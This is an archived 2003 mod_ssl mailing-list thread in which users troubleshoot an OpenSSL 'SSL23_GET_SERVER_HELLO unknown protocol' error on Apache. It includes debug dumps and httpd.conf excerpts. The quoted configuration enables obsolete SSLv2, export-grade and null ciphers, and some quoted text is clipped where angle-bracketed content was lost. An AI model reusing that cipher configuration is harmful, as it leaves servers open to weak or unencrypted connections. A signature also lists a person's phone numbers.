protocol:s23_clnt.c:460:
...
Looking at line 460 of the source, it is exactly that error, no further
clues available.
Does anyone know more about it and want to help out ???
CHeers.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  7 16:08:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B9F5A8942; Thu,  7 Aug 2003 16:08:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny04.iplex.ssmb.com (mail4.ssmb.com [199.67.139.129])
	by master.modssl.org (Postfix) with ESMTP id C3EB1A8933
	for ; Thu,  7 Aug 2003 16:08:01 +0200 (CEST)
Received: from imbarc-ny01.ny.ssmb.com (imbarc-ny01.ny.ssmb.com [162.124.186.138])
	by imbaspam-ny04.iplex.ssmb.com (8.12.10.Beta2/8.12.10.Beta2/SSMB_EXT/evision: 1.24 $) with ESMTP id h77E7x6F006629
	for ; Thu, 7 Aug 2003 10:07:59 -0400 (EDT)
Received: from mailhub-nyc4-1.ny.ssmb.com (mailhub-nyc4-1.ny.ssmb.com [162.124.152.39])
	by imbarc-ny01.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h77E7wup001958
	for ; Thu, 7 Aug 2003 10:07:58 -0400 (EDT)
Received: from exnjsm02.nam.nsroot.net (exnjsm02.nam.nsroot.net [150.110.188.173])
	by mailhub-nyc4-1.ny.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id KAA05206
	for ; Thu, 7 Aug 2003 10:07:58 -0400 (EDT)
content-class: urn:content-classes:message
Subject: RE: SSL throws SSL23_GET_SERVER_HELLO error
Date: Thu, 7 Aug 2003 10:07:50 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FE2D@EXCHNY43>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL throws SSL23_GET_SERVER_HELLO error
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
Thread-Index: AcNcxRhcARdpyVLEQZ2//NTOq4NGtwAJ+k5w
From: "Nauman, Ahmed [IT]" 
To: 
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please see following links
http://www.mail-archive.com/modssl-users@modssl.org/msg16205.html
http://forums.devshed.com/archive/15/2001/11/4/25897

Hope they help.

Regards,
Nauman
_______________________________________________
Citibank N.A., 111 Wall St., New York, NY
Ph:   +1-212-657-1070 (w), +1-718-951-0508 (h)
Fax: +1-212-657-1645


-----Original Message-----
From: Arthur Chan [mailto:achana@saysit.com.hk]
Sent: Thursday, August 07, 2003 5:10 AM
To: modssl-users@modssl.org
Subject: SSL throws SSL23_GET_SERVER_HELLO error


Hi All.
When I run the  following line command :
[ssl] # openssl s_client -connect localhost:443 -state -debug
I get this error message :
...
SSL_connect:error in SSLv2/v3 read server hello A
1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:460:
...
Looking at line 460 of the source, it is exactly that error, no further
clues available.
Does anyone know more about it and want to help out ???
CHeers.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  8 06:48:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 03E5CA8942; Fri,  8 Aug 2003 06:48:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 97CB6A8934
	for ; Fri,  8 Aug 2003 06:48:53 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h784moRm007478 for ; Fri, 8 Aug 2003 12:48:51 +0800 (CST)
Message-ID: <008001c35d67$12d576e0$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <9F1AE1497901D71185A20002A56B9B2601B0FE2D@EXCHNY43>
Subject: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error
Date: Fri, 8 Aug 2003 00:39:36 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hiya
I followed the discussion on those links, but it was not conclusive for me.
It would seem that I have got both apache2.0.40 + mod_ssl talking with
OpenSSL, using name-based vhosts. I have the certificate installed and
self-signed. However
[ssl] # openssl s_client -connect localhost:443 -state -debug
still throws this sticky error :
SSL_connect:error in SSLv2/v3 read server hello A
1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:460:
I am down to checking the source code (reveals nothing much other than it is
an error), and blindly changing things in httpd.conf...
Frustrating

----- Original Message -----
From: "Nauman, Ahmed [IT]" 
To: 
Sent: Thursday, August 07, 2003 10:07 AM
Subject: RE: SSL throws SSL23_GET_SERVER_HELLO error


Please see following links
http://www.mail-archive.com/modssl-users@modssl.org/msg16205.html
http://forums.devshed.com/archive/15/2001/11/4/25897

Hope they help.

Regards,
Nauman
_______________________________________________
Citibank N.A., 111 Wall St., New York, NY
Ph:   +1-212-657-1070 (w), +1-718-951-0508 (h)
Fax: +1-212-657-1645


-----Original Message-----
From: Arthur Chan [mailto:achana@saysit.com.hk]
Sent: Thursday, August 07, 2003 5:10 AM
To: modssl-users@modssl.org
Subject: SSL throws SSL23_GET_SERVER_HELLO error


Hi All.
When I run the  following line command :
[ssl] # openssl s_client -connect localhost:443 -state -debug
I get this error message :
...
SSL_connect:error in SSLv2/v3 read server hello A
1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:460:
...
Looking at line 460 of the source, it is exactly that error, no further
clues available.
Does anyone know more about it and want to help out ???
CHeers.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  8 07:51:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DE38A8942; Fri,  8 Aug 2003 07:51:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 2BD0CA8934
	for ; Fri,  8 Aug 2003 07:51:50 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.9/8.12.8/UVACS-2003031900) with ESMTP id h785pjL9024436
	for ; Fri, 8 Aug 2003 01:51:45 -0400 (EDT)
Date: Fri, 8 Aug 2003 01:51:45 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error
In-Reply-To: <008001c35d67$12d576e0$0200a8c0@com>
Message-ID: 
References: <9F1AE1497901D71185A20002A56B9B2601B0FE2D@EXCHNY43>
 <008001c35d67$12d576e0$0200a8c0@com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 8 Aug 2003, Arthur Chan wrote:

> [ssl] # openssl s_client -connect localhost:443 -state -debug
> still throws this sticky error :
> SSL_connect:error in SSLv2/v3 read server hello A
> 1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:460:

You have multiple problems conspiring against you here.

Problem #1: your OpenSSL doesn't have the error messages loaded so you're
getting a rather non-descriptive error message.  No big deal, it just
means you have to look harder to find out what the error means.

Problem #2: SSL23_GET_SERVER_HELLO:unknown protocol: - now I bet if you
looked at the debug dump you'd see something very similar to:
0000 - 3c 21 44 4f 43 54 59 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 35EB2A8942; Fri,  8 Aug 2003 09:30:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id EBE82A8934
	for ; Fri,  8 Aug 2003 09:30:31 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h787USRm020761 for ; Fri, 8 Aug 2003 15:30:29 +0800 (CST)
Message-ID: <001501c35d7d$a6fd0200$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <9F1AE1497901D71185A20002A56B9B2601B0FE2D@EXCHNY43> <008001c35d67$12d576e0$0200a8c0@com> 
Subject: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error
Date: Fri, 8 Aug 2003 03:21:12 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Problem #1: your OpenSSL doesn't have the error messages loaded so you're
> getting a rather non-descriptive error message.  No big deal, it just
> means you have to look harder to find out what the error means.
How to I load them in order to get a more meaningful description ???
I've recompiled Apache 2.0.40 several times from scratch with following
additional options:
./configure --with-mpm=worker --enable-so --enable-rewrite --enable-ssl --wi
th-ssl=/path/to/openssl --enable-proxy --auth_digest


> Problem #2: SSL23_GET_SERVER_HELLO:unknown protocol: - now I bet if you
> looked at the debug dump you'd see something very similar to:
> 0000 - 3c 21 44 4f 43 54 59  which was mentioned in one of those links the other guy sent you.  It's
> telling you that that's what it received from the server.  You'll notice
> that " 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 5c ec 7c 7c   ............\.||
0060 - 60 b1 2a 84 93 cf ba f5-87 dc 22 63 27 83 c7 16   `.*......."c'...
0070 - f0 68 eb 8b 33 43 57 05-e8 5e a1 ef               .h..3CW..^..
read from 0809D018 [080A25C0] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                               So this tells you that your web server is in fact speaking plain HTTP on
> port 443 rather than HTTPS.  You probably do not have "SSLEngine on" for
> that virtual host.
This defies purpose. Following is an excerpt from httpd.conf with only those
bits that I believe are relevant . What I done that's wrong :
(httpd.conf)

ServerName www.saysit.com.hk:80
#

# Some MIME-types for downloading Certificates and CRLs
   AddType application/x-x509-ca-cert .crt
   AddType application/x-pkcs7-crl    .crl
   SSLSessionCache  dbm:logs/ssl_scache
   SSLSessionCacheTimeout 300
   SSLMutex  file:logs/mutex
   SSLRandomSeed startup builtin
   SSLRandomSeed connect builtin

### Section 3: Virtual Hosts
Listen 80
Listen 443
NameVirtualHost 192.168.1.3

    ServerName www.saysit.com.hk
    ServerAdmin achana@saysit.com.hk
    DocumentRoot /var/www/html
    ErrorLog /usr/local/apache2/logs/saysit_error.log
    CustomLog /usr/local/apache2/logs/saysit_access.log common
    SetEnvIf User-Agent ".MSIE.*"\
       nokeepalive ssl-unclean-shutdown \
       downgrade-1.0 force-response-1.0
    JkMount /saysit ajp13
    JkMount /saysit/* ajp13

#


    ServerName demo.saysit.com.hk
    ServerAdmin achana@saysit.com.hk
    DocumentRoot /home/nicole/MyDocument/public_html
    ErrorLog /usr/local/apache2/logs/nicole_error.log
    CustomLog /usr/local/apache2/logs/nicole_access.log common
    
       SSLEngine on
       SSLCipherSuite
ALL:!ADH:!EPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
       SSLCertificateFile /usr/share/ssl/server.crt
       SSLCertificateKeyFile /usr/share/ssl/server.key
####   SSLVerifyClient require #### will prompt the client to select a
certificate when browsing demo.saysit
    
    JkExtractSSL on
    JkHTTPSIndicator HTTPS
    JkSESSIONIndicator SSL_SESSION_ID
    JkCIPHERIndicator SSL_CIPHER
    JkCERTSIndicator SSL_CLIENT_CERT
    JkMount /saysit ajp13
    JkMount /saysit/* ajp13




> Problem #3: You mentioned trying to get name-based vhosts to work with
> SSL.  You must realize that this doesn't work right in the general case.
> Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2 .
Yes, I read that document and I do want to provide both http and https on a
single server with one single IP address (I am NAT-ting on router with one
external ip - does that matter?)


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  8 12:45:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DEB7EA8942; Fri,  8 Aug 2003 12:45:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id 0F2EFA8934
	for ; Fri,  8 Aug 2003 12:45:33 +0200 (CEST)
Received: from mc1.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id TAA06894; Fri, 8 Aug 2003 19:45:15 +0900 (JST)
Received: (from root@localhost)
	by mc1.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h78AjEx08086
	for ; Fri, 8 Aug 2003 19:45:14 +0900 (JST)
Received: from unknown [192.168.2.1] by mc1.mcg.hitachi.co.jp with SMTP id VAA08084 ; Fri, 8 Aug 2003 19:45:14 +0900
Received: from navsg1.hitachi.co.jp by navsg1.hitachi.co.jp (8.9.3/3.7W-navsg1) id TAA25801; Fri, 8 Aug 2003 19:45:13 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg1.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003080819451328084
 ; Fri, 08 Aug 2003 19:45:13 +0900
Received: from navgw4.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h78Aj7OS012609; Fri, 8 Aug 2003 19:45:13 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw4.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003080819451321900
 ; Fri, 08 Aug 2003 19:45:13 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id TAA25138;
	Fri, 8 Aug 2003 19:45:13 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h78AjCo67065;
	Fri, 8 Aug 2003 19:45:12 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Fri, 08 Aug 2003 19:44:49 +0900 (JST)
Message-Id: <20030808.194449.71131406.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, achana@saysit.com.hk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error
From: Kiyoshi Watanabe 
In-Reply-To: <001501c35d7d$a6fd0200$0200a8c0@com>
References: <008001c35d67$12d576e0$0200a8c0@com>
	
	<001501c35d7d$a6fd0200$0200a8c0@com>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

did you test the openssl command using your IP instead of localhost?

  openssl s_client -connect your-ip-here:443 -state -debug

Or why don't you change the VirtualHohost to _default_ temporarily and
see how it goes.

-Kiyoshi
Kiyoshi Watanabe



> > Problem #1: your OpenSSL doesn't have the error messages loaded so you're
> > getting a rather non-descriptive error message.  No big deal, it just
> > means you have to look harder to find out what the error means.
> How to I load them in order to get a more meaningful description ???
> I've recompiled Apache 2.0.40 several times from scratch with following
> additional options:
> ./configure --with-mpm=worker --enable-so --enable-rewrite --enable-ssl --wi
> th-ssl=/path/to/openssl --enable-proxy --auth_digest
> 
> 
> > Problem #2: SSL23_GET_SERVER_HELLO:unknown protocol: - now I bet if you
> > looked at the debug dump you'd see something very similar to:
> > 0000 - 3c 21 44 4f 43 54 59  > which was mentioned in one of those links the other guy sent you.  It's
> > telling you that that's what it received from the server.  You'll notice
> > that " Indeed, this is the whole output :
> CONNECTED(00000003)
> write to 0809D018 [0809D060] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 5c ec 7c 7c   ............\.||
> 0060 - 60 b1 2a 84 93 cf ba f5-87 dc 22 63 27 83 c7 16   `.*......."c'...
> 0070 - f0 68 eb 8b 33 43 57 05-e8 5e a1 ef               .h..3CW..^..
> read from 0809D018 [080A25C0] (7 bytes => 7 (0x7))
> 0000 - 3c 21 44 4f 43 54 59                               SSL_connect:error in SSLv2/v3 read server hello A
> 1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:460:
> 
> > So this tells you that your web server is in fact speaking plain HTTP on
> > port 443 rather than HTTPS.  You probably do not have "SSLEngine on" for
> > that virtual host.
> This defies purpose. Following is an excerpt from httpd.conf with only those
> bits that I believe are relevant . What I done that's wrong :
> (httpd.conf)
> 
> ServerName www.saysit.com.hk:80
> #
> 
> # Some MIME-types for downloading Certificates and CRLs
>    AddType application/x-x509-ca-cert .crt
>    AddType application/x-pkcs7-crl    .crl
>    SSLSessionCache  dbm:logs/ssl_scache
>    SSLSessionCacheTimeout 300
>    SSLMutex  file:logs/mutex
>    SSLRandomSeed startup builtin
>    SSLRandomSeed connect builtin
> 
> ### Section 3: Virtual Hosts
> Listen 80
> Listen 443
> NameVirtualHost 192.168.1.3
> 
>     ServerName www.saysit.com.hk
>     ServerAdmin achana@saysit.com.hk
>     DocumentRoot /var/www/html
>     ErrorLog /usr/local/apache2/logs/saysit_error.log
>     CustomLog /usr/local/apache2/logs/saysit_access.log common
>     SetEnvIf User-Agent ".MSIE.*"\
>        nokeepalive ssl-unclean-shutdown \
>        downgrade-1.0 force-response-1.0
>     JkMount /saysit ajp13
>     JkMount /saysit/* ajp13
> 
> #
> 
> 
>     ServerName demo.saysit.com.hk
>     ServerAdmin achana@saysit.com.hk
>     DocumentRoot /home/nicole/MyDocument/public_html
>     ErrorLog /usr/local/apache2/logs/nicole_error.log
>     CustomLog /usr/local/apache2/logs/nicole_access.log common
>     
>        SSLEngine on
>        SSLCipherSuite
> ALL:!ADH:!EPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>        SSLCertificateFile /usr/share/ssl/server.crt
>        SSLCertificateKeyFile /usr/share/ssl/server.key
> ####   SSLVerifyClient require #### will prompt the client to select a
> certificate when browsing demo.saysit
>     
>     JkExtractSSL on
>     JkHTTPSIndicator HTTPS
>     JkSESSIONIndicator SSL_SESSION_ID
>     JkCIPHERIndicator SSL_CIPHER
>     JkCERTSIndicator SSL_CLIENT_CERT
>     JkMount /saysit ajp13
>     JkMount /saysit/* ajp13
> 
> 
> 
> 
> > Problem #3: You mentioned trying to get name-based vhosts to work with
> > SSL.  You must realize that this doesn't work right in the general case.
> > Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2 .
> Yes, I read that document and I do want to provide both http and https on a
> single server with one single IP address (I am NAT-ting on router with one
> external ip - does that matter?)
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  8 13:01:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EB962A8942; Fri,  8 Aug 2003 13:00:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id E1D6EA8934
	for ; Fri,  8 Aug 2003 13:00:54 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h78B0j0D002524 for ; Fri, 8 Aug 2003 19:00:45 +0800 (CST)
Message-ID: <001801c35d9b$05cad9c0$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <008001c35d67$12d576e0$0200a8c0@com><001501c35d7d$a6fd0200$0200a8c0@com> <20030808.194449.71131406.kiyoshi@bisd.hitachi.co.jp>
Subject: But why does it work now : SSL throws SSL23_GET_SERVER_HELLO error
Date: Fri, 8 Aug 2003 06:51:27 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Yoshi.
I think that works !
Instead of
[ssl] # openssl s_client -connect localhost:443 -state -debug
I key in
[ssl] # openssl s_client -connect 192.168.100.10:443 -state -debug
and it worked, no SSL23_GET_SERVER_HELLO error, why is that ???
I am still *VERY CONCERNED* that the output from TCPDUMP contains human
readible data (admittedly you won't be able to get much out of that ).
Its nothing like the plain text http transmission, try it out !


----- Original Message -----
From: "Kiyoshi Watanabe" 
To: ; 
Cc: 
Sent: Friday, August 08, 2003 06:44 AM
Subject: Re: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error


>
> Hello,
>
> did you test the openssl command using your IP instead of localhost?
>
>   openssl s_client -connect your-ip-here:443 -state -debug
>
> Or why don't you change the VirtualHohost to _default_ temporarily and
> see how it goes.
>
> -Kiyoshi
> Kiyoshi Watanabe
>
>
>
> > > Problem #1: your OpenSSL doesn't have the error messages loaded so
you're
> > > getting a rather non-descriptive error message.  No big deal, it just
> > > means you have to look harder to find out what the error means.
> > How to I load them in order to get a more meaningful description ???
> > I've recompiled Apache 2.0.40 several times from scratch with following
> > additional options:
> >
./configure --with-mpm=worker --enable-so --enable-rewrite --enable-ssl --wi
> > th-ssl=/path/to/openssl --enable-proxy --auth_digest
> >
> >
> > > Problem #2: SSL23_GET_SERVER_HELLO:unknown protocol: - now I bet if
you
> > > looked at the debug dump you'd see something very similar to:
> > > 0000 - 3c 21 44 4f 43 54 59  > > which was mentioned in one of those links the other guy sent you.
It's
> > > telling you that that's what it received from the server.  You'll
notice
> > > that " > Indeed, this is the whole output :
> > CONNECTED(00000003)
> > write to 0809D018 [0809D060] (124 bytes => 124 (0x7C))
> > 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q...
.....
> > 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04
.........f......
> > 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00
...........e..d.
> > 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00
.c..b..a..`.....
> > 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08
......@.........
> > 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 5c ec 7c 7c
............\.||
> > 0060 - 60 b1 2a 84 93 cf ba f5-87 dc 22 63 27 83 c7 16
`.*......."c'...
> > 0070 - f0 68 eb 8b 33 43 57 05-e8 5e a1 ef               .h..3CW..^..
> > read from 0809D018 [080A25C0] (7 bytes => 7 (0x7))
> > 0000 - 3c 21 44 4f 43 54 59                               > SSL_connect:error in SSLv2/v3 read server hello A
> > 1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> > protocol:s23_clnt.c:460:
> >
> > > So this tells you that your web server is in fact speaking plain HTTP
on
> > > port 443 rather than HTTPS.  You probably do not have "SSLEngine on"
for
> > > that virtual host.
> > This defies purpose. Following is an excerpt from httpd.conf with only
those
> > bits that I believe are relevant . What I done that's wrong :
> > (httpd.conf)
> >
> > ServerName www.saysit.com.hk:80
> > #
> > 
> > # Some MIME-types for downloading Certificates and CRLs
> >    AddType application/x-x509-ca-cert .crt
> >    AddType application/x-pkcs7-crl    .crl
> >    SSLSessionCache  dbm:logs/ssl_scache
> >    SSLSessionCacheTimeout 300
> >    SSLMutex  file:logs/mutex
> >    SSLRandomSeed startup builtin
> >    SSLRandomSeed connect builtin
> > 
> > ### Section 3: Virtual Hosts
> > Listen 80
> > Listen 443
> > NameVirtualHost 192.168.1.3
> > 
> >     ServerName www.saysit.com.hk
> >     ServerAdmin achana@saysit.com.hk
> >     DocumentRoot /var/www/html
> >     ErrorLog /usr/local/apache2/logs/saysit_error.log
> >     CustomLog /usr/local/apache2/logs/saysit_access.log common
> >     SetEnvIf User-Agent ".MSIE.*"\
> >        nokeepalive ssl-unclean-shutdown \
> >        downgrade-1.0 force-response-1.0
> >     JkMount /saysit ajp13
> >     JkMount /saysit/* ajp13
> > 
> > #
> > 
> > 
> >     ServerName demo.saysit.com.hk
> >     ServerAdmin achana@saysit.com.hk
> >     DocumentRoot /home/nicole/MyDocument/public_html
> >     ErrorLog /usr/local/apache2/logs/nicole_error.log
> >     CustomLog /usr/local/apache2/logs/nicole_access.log common
> >     
> >        SSLEngine on
> >        SSLCipherSuite
> > ALL:!ADH:!EPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >        SSLCertificateFile /usr/share/ssl/server.crt
> >        SSLCertificateKeyFile /usr/share/ssl/server.key
> > ####   SSLVerifyClient require #### will prompt the client to select a
> > certificate when browsing demo.saysit
> >     
> >     JkExtractSSL on
> >     JkHTTPSIndicator HTTPS
> >     JkSESSIONIndicator SSL_SESSION_ID
> >     JkCIPHERIndicator SSL_CIPHER
> >     JkCERTSIndicator SSL_CLIENT_CERT
> >     JkMount /saysit ajp13
> >     JkMount /saysit/* ajp13
> > 
> > 
> >
> >
> > > Problem #3: You mentioned trying to get name-based vhosts to work with
> > > SSL.  You must realize that this doesn't work right in the general
case.
